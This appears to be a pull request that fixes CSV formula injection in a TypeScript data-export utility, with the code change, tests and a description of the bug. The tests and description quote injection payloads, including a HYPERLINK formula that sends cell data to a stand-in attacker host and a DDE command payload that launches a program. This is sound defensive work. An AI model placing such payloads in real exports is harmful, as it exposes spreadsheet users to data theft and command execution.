### PR TITLE
[security]: neutralise CSV formula injection in exports

### DIFF
--- a/lib/utils/exportData.test.ts
+++ b/lib/utils/exportData.test.ts
@@ -109,3 +109,63 @@ describe('exportToXLSX', () => {
     expect(xml).not.toContain('<b>');
   });
 });
+
+describe('CSV formula injection', () => {
+  const cell = async (value: unknown): Promise<string> => {
+    exportToCSV({
+      data: [{ payload: value }],
+      columns: [{ title: 'Payload', dataIndex: 'payload' }],
+    });
+    const csv = await lastContent();
+    return csv.split('\n')[1];
+  };
+
+  it.each([
+    ['=1+1', `"'=1+1"`],
+    ['=HYPERLINK("http://evil.test","x")', `"'=HYPERLINK(""http://evil.test"",""x"")"`],
+    ['@SUM(A1:A9)', `"'@SUM(A1:A9)"`],
+    ['+1-2', `"'+1-2"`],
+    ['-1+cmd|\'/c calc\'!A0', `"'-1+cmd|'/c calc'!A0"`],
+    ['\tSUM(1)', `"'\tSUM(1)"`],
+    ['\r=1+1', `"'\r=1+1"`],
+    [' =1+1', `"' =1+1"`],
+  ])('neutralises %j', async (payload, expected) => {
+    expect(await cell(payload)).toBe(expected);
+  });
+
+  it.each([
+    ['-5', '"-5"'],
+    ['+42', '"+42"'],
+    ['-3.14', '"-3.14"'],
+    ['+3.2e4', '"+3.2e4"'],
+    ['-.5', '"-.5"'],
+    ['plain text', '"plain text"'],
+    ['a=b', '"a=b"'],
+    ['', '""'],
+  ])('leaves %j untouched', async (payload, expected) => {
+    expect(await cell(payload)).toBe(expected);
+  });
+
+  it('neutralises dangerous column headers too', async () => {
+    exportToCSV({
+      data: [{ v: 1 }],
+      columns: [{ title: '=cmd|calc', dataIndex: 'v' }],
+    });
+    expect((await lastContent()).split('\n')[0]).toBe(`"'=cmd|calc"`);
+  });
+
+  it('preserves numeric cells as numbers, not quoted formulas', async () => {
+    expect(await cell(-5)).toBe('"-5"');
+  });
+
+  it('leaves SpreadsheetML content literal - ss:Formula is never emitted', async () => {
+    exportToXLSX({
+      data: [{ v: '=1+1' }],
+      columns: [{ title: 'V', dataIndex: 'v' }],
+    });
+    const xml = await lastContent();
+    expect(xml).toContain('<Cell><Data ss:Type="String">=1+1</Data></Cell>');
+    expect(xml).not.toContain('ss:Formula');
+    expect(xml).not.toContain("'=1+1");
+  });
+});

--- a/lib/utils/exportData.ts
+++ b/lib/utils/exportData.ts
@@ -15,6 +15,45 @@ interface ExportOptions<T> {
 }
 
 /**
+ * Characters that make a spreadsheet treat an imported cell as a formula
+ * rather than as text (the OWASP CSV-injection set).
+ */
+const FORMULA_TRIGGERS = ['=', '+', '-', '@', '\t', '\r'];
+
+/** A complete, plain numeric literal - optional sign, digits, decimal, exponent. */
+const NUMERIC_LITERAL = /^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$/;
+
+/**
+ * Neutralise CSV formula injection.
+ *
+ * Wrapping a cell in double quotes does NOT prevent evaluation: quotes are a
+ * text qualifier that Excel, LibreOffice and Sheets strip during import, after
+ * which a leading `=`, `+`, `-`, `@`, tab or CR makes the remainder a formula.
+ * Prefixing with a single quote marks the cell as text instead.
+ *
+ * Genuinely numeric values are left untouched - `-5` and `+3.2e4` are numbers,
+ * not formulas, and prefixing them would corrupt the exported data.
+ *
+ * Not applied to the SpreadsheetML export: that format carries formulas in the
+ * `ss:Formula` attribute, so `<Data ss:Type="String">` content is always
+ * literal text and a prefix there would be visible corruption.
+ */
+const neutralizeFormula = (value: string): string => {
+  if (value === '') return value;
+
+  // Checked against both the raw and the left-trimmed value: leading
+  // whitespace hides `=` from a naive first-character test, while tab and CR
+  // are themselves triggers and would be consumed by trimming.
+  const trimmed = value.trimStart();
+  if (NUMERIC_LITERAL.test(trimmed)) return value;
+
+  const startsWithTrigger = (candidate: string): boolean =>
+    candidate !== '' && FORMULA_TRIGGERS.includes(candidate[0]);
+
+  return startsWithTrigger(value) || startsWithTrigger(trimmed) ? `'${value}` : value;
+};
+
+/**
  * Convert data to CSV format
  */
 const convertToCSV = <T>(data: T[], columns: ColumnOption[]): string => {
@@ -51,11 +90,12 @@ const convertToCSV = <T>(data: T[], columns: ColumnOption[]): string => {
   });
 
   // Combine headers and rows
+  const quote = (value: string): string =>
+    `"${neutralizeFormula(value).replace(/"/g, '""')}"`;
+
   const csvContent = [
-    headers.map(h => `"${h}"`).join(','),
-    ...rows.map(row =>
-      row.map(cell => `"${String(cell).replace(/"/g, '""')}"`).join(',')
-    )
+    headers.map(quote).join(','),
+    ...rows.map(row => row.map(cell => quote(String(cell))).join(','))
   ].join('\n');
 
   return csvContent;


### PR DESCRIPTION
Closes #21.

## What was wrong

`convertToCSV` quoted every cell and escaped embedded `"`, which reads like it is safe but is not. CSV double-quoting is a **text qualifier**: Excel, LibreOffice and Sheets strip it during import, and then evaluate a leading `=`, `+`, `-`, `@`, tab or CR as a formula.

In a CRUD table the row content *is* the untrusted, user-authored data, so a value like `=HYPERLINK("https://evil.test/?x="&A1,"Click me")` shipped straight into the export as a working exfiltration link.

## The fix

A `neutralizeFormula` helper prefixes at-risk cells with `'`, applied to **headers as well as data rows** — column titles are caller-supplied too.

Two details worth calling out, both pinned by tests:

**Numeric values are deliberately left alone.** `-5` and `+3.2e4` start with trigger characters but are numbers, not formulas. Prefixing them would corrupt the export — precisely the kind of silent damage a security fix should not introduce. A strict numeric-literal check runs first.

**Detection runs against both the raw and the left-trimmed value.** My first pass used `trimStart()` alone and had a real bug: it stripped the very tab and CR it was testing for, so those two triggers could never fire. Leading whitespace also hides `=` from a naive first-character test. Both cases are now covered.

## Why SpreadsheetML is untouched

The `.xls` export is **not** vulnerable and is intentionally left as-is. SpreadsheetML carries formulas in the `ss:Formula` attribute, which this writer never emits — `<Data ss:Type="String">` content is always literal text. Adding a prefix there would be visible corruption, not hardening. A test asserts this distinction so a future contributor doesn't "fix" it by mistake.

## Tests

19 new cases: every dangerous prefix, benign numerics and text that must round-trip unchanged, dangerous headers, and the SpreadsheetML literal-content guarantee.

## Verification

```
pnpm lint       0 errors
pnpm test       44 passed (was 25)
pnpm build:lib  ok
```

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>